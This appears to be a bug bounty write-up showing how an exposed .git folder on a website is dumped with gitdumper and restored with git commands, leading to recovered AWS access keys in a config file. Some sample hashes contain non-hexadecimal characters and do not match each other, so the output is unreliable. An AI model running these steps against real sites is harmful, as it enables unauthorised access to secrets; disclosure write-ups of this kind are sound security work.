How .git folder can be exploited to access sensitive data

This is Satya, (Security Researcher/Bug Bounty Hunter). In this writeup, I’m going to show you how I was able to exploit .git to access sensitive data of my target website. So, Let’s get Started…..

What is .git folder??

Git stores the metadata and object database for your project. This is the most important part of Git, and it is what is copied when you clone a repository from another computer. Here “object“ includes “blob”, “tree”, “commit”, and “tag”.

Firstly, You need to download the .git folder using GitTools gitdumper.

GitHub - internetwache/GitTools: A repository with 3 tools for pwn'ing websites with .git…

cmd : ./gitdumper https://app.example.com/.git example.com

Find main/master branch hash code to get tree,commit,blob

cmd : cat .git/refs/heads/main (or) cat .git/refs/heads/master

output : da09407c30b6f984fb15e660ac80a282f61d4984

You can view the tree,commit,blob by using the main/master branch hash code.

git show -s --pretty=raw da09407c30b6f984fb15e660ac80a282f61d4984

output : 

commit da09407c30b6df87f87dd60ac80a282f61d466a
tree   eb7a07fde7f8chbfdf78ffdb6a5cf989991c5a6
parent 77fbaa460d95ba8144ebn657njc2fca865a41128

To view the content of these objects like tree,blob,parent etc…, use the command git cat-file to examine the object content.

git cat-file -p eb7a07fde7f8chbfdf78ffdb6a5cf989991c5a6

output :

040000 tree 9867559d614af20026a81hjbd9345d2c409885dc0b7c54    Config
100755 blob b08kjnd8689nfdg98ycd41f538bbc574bb8acb198f8083    secret.txt

Now Let’s Exploit This :

You can view all the status of the entire local changes. For example if a developer deleted a file named secret.txt and made the commit for the change, you will see the secret.txt file deletion commit with git status command.

The git restore command will discard any local, uncommitted changes in the corresponding files and thereby restore their last committed state.

git restore . 

You will see the restored files in your Target folder

Now, Manually check each files and folders to get any sensitive information disclosure…

I got folder named config, In that folder a file named aws.php contains the AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY.

If you wanna know How to exploit AWS credentials…You can read my previous writeup :

How .js file helped me to find and Exploit AWS Access key and Secret

If you like this writeup and want more writeups like this…….Please clap and follow me on

LinkedIn : https://www.linkedin.com/in/satyasai1460

medium : https://medium.com/@satyasai1460

Instagram : https://www.instagram.com/satyasai1460/

Twitter : https://twitter.com/satyasai1460